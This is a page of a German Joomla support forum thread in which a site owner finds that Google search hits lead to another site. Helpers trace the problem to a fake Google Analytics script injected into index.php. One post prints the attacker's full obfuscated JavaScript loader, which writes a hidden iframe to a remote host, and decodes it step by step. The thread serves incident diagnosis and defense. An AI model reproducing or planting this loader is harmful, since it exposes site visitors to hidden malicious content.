+ Antworten
Seite 1 von 3 1 2 3 LetzteLetzte
Ergebnis 1 bis 10 von 23

Thema: meine Seite wurde von fremder Hand verlinkt

  1. #1
    Neu an Board
    Registriert seit
    17.12.2007
    Beiträge
    78
    Bedankte sich
    52
    1 Danksagung in 1 Beitrag

    Standard meine Seite wurde von fremder Hand verlinkt

    Hi Cracks!

    Wenn Google meine Seite www.atmonis.ch findet, z.B. über "Kreta, Meersicht" (mit diesen Begriffen ist sie ganz oben - was aber noch das einzige erfeuliche ist) und dann der Hyperlink angeklickt wird, KOMMT MAN AUF EINE ANDERE SEITE! (Da reicht ein Wütend-Smiley nicht mehr).

    Was kann ich machen?
    Hat jemand mein Passwort geknackt?

    Version: 1.0.15 Stable
    Module:
    - astatsPRO
    - joomfish
    - easybook

    Besten Dank!
    Ago

    EDIT:
    http://www.joomlaportal.de/sicherhei...ogle-info.html
    Geändert von Agoraso (30.06.2008 um 17:39 Uhr) Grund: Link zur Zusammenfassung

  2. #2
    Ex-Über-Mod Avatar von rico
    Registriert seit
    04.12.2005
    Ort
    Potsdam
    Alter
    46
    Beiträge
    1.699
    Bedankte sich
    237
    Erhielt 466 Danksagungen
    in 383 Beiträgen

    Standard

    Aber so wie ich das sehe ist das eine Google-Such-Seite (http://analytics-google.info). Im Cache ist Deine Seite jedoch noch vorhanden ....

    MFG. Ricola
    Kleines Tutorial zum Objektorientierten Programmieren mit PHP

  3. Erhielt Danksagungen von:


  4. #3
    Kommt häufiger vorbei Avatar von jimbo_
    Registriert seit
    14.06.2008
    Ort
    Schweiz
    Beiträge
    351
    Bedankte sich
    0
    Erhielt 95 Danksagungen
    in 92 Beiträgen

    Standard

    Du hast im Head deiner index.php 2x den Javascript von google-analytics. Ich gehe davon aus das ist nicht korrekt. Zudem solltest Du mal überprüfen, ob der Code in diesem Script korrekt ist, der kommt mir irgendwie seltsam vor, allerdings muss ich auch gestehen, kenne ich mich damit übehaupt nicht aus...
    Gruss Jimbo
    –––––––––––––––––––––––––––––––––––
    Warum ich keinen individuellen Support geben kann. * Regeln für Supportsuchende.

  5. Erhielt Danksagungen von:


  6. #4
    Neu an Board
    Registriert seit
    17.12.2007
    Beiträge
    78
    Bedankte sich
    52
    1 Danksagung in 1 Beitrag

    Standard

    Zitat Zitat von ricola Beitrag anzeigen
    Aber so wie ich das sehe ist das eine Google-Such-Seite (http://analytics-google.info). Im Cache ist Deine Seite jedoch noch vorhanden ....

    MFG. Ricola
    Hallo Ricola
    Ja, so sehe ich das auch - es ist aber nicht meine Seite und ich will, dass sich MEINE Seite öffnet, egal was die falsche für eine ist.
    Danke
    Ago

  7. #5
    Neu an Board
    Registriert seit
    17.12.2007
    Beiträge
    78
    Bedankte sich
    52
    1 Danksagung in 1 Beitrag

    Standard

    Zitat Zitat von jimbo_ Beitrag anzeigen
    Du hast im Head deiner index.php 2x den Javascript von google-analytics. Ich gehe davon aus das ist nicht korrekt. Zudem solltest Du mal überprüfen, ob der Code in diesem Script korrekt ist, der kommt mir irgendwie seltsam vor, allerdings muss ich auch gestehen, kenne ich mich damit übehaupt nicht aus...
    Hoi Jimbo
    Kann ich in index.php die Zeilen google-analytics einfach löschen?
    Wie überprüfe ich den Code? Und wo ist der? (Sorry für die dumme Frage - bin Anfänger)
    Danke
    Ago

  8. #6
    Moderator Avatar von holmi
    Registriert seit
    30.08.2004
    Ort
    Harz
    Beiträge
    6.501
    Bedankte sich
    92
    Erhielt 1.234 Danksagungen
    in 1.133 Beiträgen

    Standard

    Es liegt recht sicher am fehlerhaften Google Analytics Code

    So sollte der aussehen:
    https://www.google.com/support/googl...55488&hl=de_DE
    (Es gibt da zwei Varianten, steht aber alles beim Link ^^)

    Den Code den du benötigst findest du in deinem Google Analytics Konto.
    https://www.google.com/support/googl...y?answer=55603

    Diesen Code ganz am ende des Template vor das </body>

    Das doppelte
    <script src="http://analytics-google.info/urchin.js"></script>
    muss raus
    (und .info ist eigentlich nicht von google??)

    Björn

    Ps. Und dann hast du noch astatsPRO drin, dann hast du die Statistik ja Doppelt und astatsPRO erzeugt extrem viele Daten in deiner Daten

    PPs. und dann schau mal was das für ein kram ist, keine Ahung für was da gut sein soll
    <body class="page_bg"><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857

    Letzte Zeile hinter: </html>
    <script>check_content()</script><!-- 1213806179 --><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a)
    Problem gelöst? Dann markiere den Thread mit [GELÖST]

  9. Erhielt Danksagungen von:


  10. #7
    War schon öfter hier Avatar von satriani-vai
    Registriert seit
    31.01.2008
    Beiträge
    199
    Bedankte sich
    19
    Erhielt 8 Danksagungen
    in 8 Beiträgen

    Standard

    Man muss aber bedenken, dass es das Performance der Seite beeinträchtigt
    Ob es sich überhaupt lohnt?

  11. Erhielt Danksagungen von:


  12. #8
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.181
    Bedankte sich
    63
    Erhielt 1.223 Danksagungen
    in 1.070 Beiträgen

    Standard

    Zumal auch noch astatsPRO in Betrieb ist... wie viel Statistik braucht einer Seite?

  13. Erhielt Danksagungen von:


  14. #9
    Neu an Board
    Registriert seit
    18.06.2008
    Beiträge
    2
    Bedankte sich
    0
    Erhielt 5 Danksagung
    in 1 Beitrag

    Standard

    Ich hab genau das gleiche Problem, bei mir in der index.php befinden sich seit gestern diese "Google Analytics" links.

    In wirklichkeit kommt diese domain aber nicht von google, sondern von einem Hacker, den ich gestern dabei erwischt habe, wie er diesen Quellcode in meine Seite einbauen wollte!

    Man beachte, dass,
    http://www.google-analytics.com/urchin.js ---> das offizielle Java-Script von Google
    http://www.analytics-google.info/urchin.js ---> und das der eingeschleuste Code vom Hacker ist!

    Ausserdem hat bei mir der Hacker folgenden Code eingebaut:

    Code:
    <script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857aa739cd0a(){return 16;} return (parseInt(m4857aa739c91a,m4857aa739cd0a()));}function m4857aa739d4f5(m4857aa739d8ed){ var m4857aa739e4d4=2; var m4857aa739dce4='';m4857aa739ecc3=String.fromCharCode;for(m4857aa739e0dd=0;m4857aa739e0dd<m4857aa739d8ed.length;m4857aa739e0dd+=m4857aa739e4d4){ m4857aa739dce4+=(m4857aa739ecc3(c1131313m4857aa739c121(m4857aa739d8ed.substr(m4857aa739e0dd,m4857aa739e4d4))));}return m4857aa739dce4;} var m4857aa739f0bb='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B76617220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E646973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312532302537332537322536332533642532372536382537342537342537302533612532662532662537362536392537362536392537342537352537332536332536392536312532652536332536662536642532662536392536642536312536372536352537332532662537332537342536312537342537332532652536382537342536642536632533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533362533392533312533322533382532392532622532372533362536362536352533392536352533382536342533302536312533312533362532372532302537372536392536342537342536382533642533372533382533332532302536382536352536392536372536382537342533642533322533312533362532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E[/SIZE]';document.write(m4857aa739d4f5(m4857aa739f0bb));</script><!-- /ad --><script>check_content()</script>

    Wenn man diesen entschlüsselt, kommt heraus, dass folgendes auf die Seite geladen wird:

    Code:
    	function funktion3(parameter2)
    		{ function funktion2()
    			{return 16;} 
    		return (parseInt(parameter2,funktion2()));}
    	
    	function funktion1(parameter1)
    		{ var variabel1=2;
    		var variabel2='';
    		variabel3=String.fromCharCode;
    		for(variabel4=0; variabel4<parameter1.length; variabel4+=variabel1)
    		{ variabel2+=(variabel3(funktion3(parameter1.substr(variabel4,variabel1))));}
    		return variabel2;} 
    		
    		var wert1='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B76617220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E646973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312532302537332537322536332533642532372536382537342537342537302533612532662532662537362536392537362536392537342537352537332536332536392536312532652536332536662536642532662536392536642536312536372536352537332532662537332537342536312537342537332532652536382537342536642536632533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533362533392533312533322533382532392532622532372533362536362536352533392536352533382536342533302536312533312533362532372532302537372536392536342537342536382533642533372533382533332532302536382536352536392536372536382537342533642533322533312533362532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';
    		document.write(funktion1(wert1));
    Dieser wiederrum ist wieder "verschlüsselt" und gibt schlussendlich folgendes auf die Seite aus:

    Code:
    </script><!-- /ad -->
    		**********
    		function check_content()
    		{
    			var i=0;
    			while(document.getElementsByTagName('iframe').length)
    			{
    				var el=document.getElementsByTagName('iframe')[i];
    				if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1')
    					{el.parentNode.removeChild(el);}
    				else 
    					i++;
    			}
    		}
    		
    		check_content();
    		if(!myia)
    		{document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%76%69%76%69%74%75%73%63%69%61%2e%63%6f%6d%2f%69%6d%61%67%65%73%2f%73%74%61%74%73%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%36%39%31%32%38%29%2b%27%36%66%65%39%65%38%64%30%61%31%36%27%20%77%69%64%74%68%3d%37%38%33%20%68%65%69%67%68%74%3d%32%31%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>
    		<script>check_content()</script>
    Und wenn man diesen "Verschlüsselten Code" auch hier wieder entschlüsselt sieht man, dass ein IFrame auf die Seite geladen wird:

    Code:
    <iframe name=c1 src='http://***********/stats.html?'+Math.round(Math.random()*169128)+'6fe9e8d0a16' width=783 height=216 style='display: none'></iframe>
    Geändert von holmi (18.06.2008 um 23:31 Uhr) Grund: URL gelöscht

  15. Erhielt Danksagungen von:


  16. #10
    Moderator Avatar von holmi
    Registriert seit
    30.08.2004
    Ort
    Harz
    Beiträge
    6.501
    Bedankte sich
    92
    Erhielt 1.234 Danksagungen
    in 1.133 Beiträgen

    Standard

    Danke, das Beantwort mein PPS. von oben.
    Die URL die da eingebunden wird habe ich mal gelöscht, wir wollen ja nicht noch Werbung dafür machen ;-)

    @ Agoraso du solltest deine Seite jetzt schnell mal ganz genau Prüfen!
    http://www.joomlaportal.de/sicherhei...tml#post665966

    Welche Joomla Version nutzt du?
    Welche Erweiterungen sind installiert? (Mit Version)
    http://docs.joomla.org/Vulnerable_Extensions_List

    Der Hacker kennt deine Passwörter und könnte noch mehr Code eingeschleust haben, kontrollier das also ordentlich.

    EDIT:
    Bei Google findet man noch mehr Foren in denen seit kurzen nach diesen Code gefragt wird
    z.B. Hier:
    http://forums.x10hosting.com/free-ho...ease-help.html
    Und das Problem dieses Users sollte einem zu denken geben ;-)
    Remove? No, it will automatically appear as a ghost! I cannot control that code.

    Björn
    Problem gelöst? Dann markiere den Thread mit [GELÖST]

  17. Erhielt Danksagungen von:


+ Antworten
Seite 1 von 3 1 2 3 LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein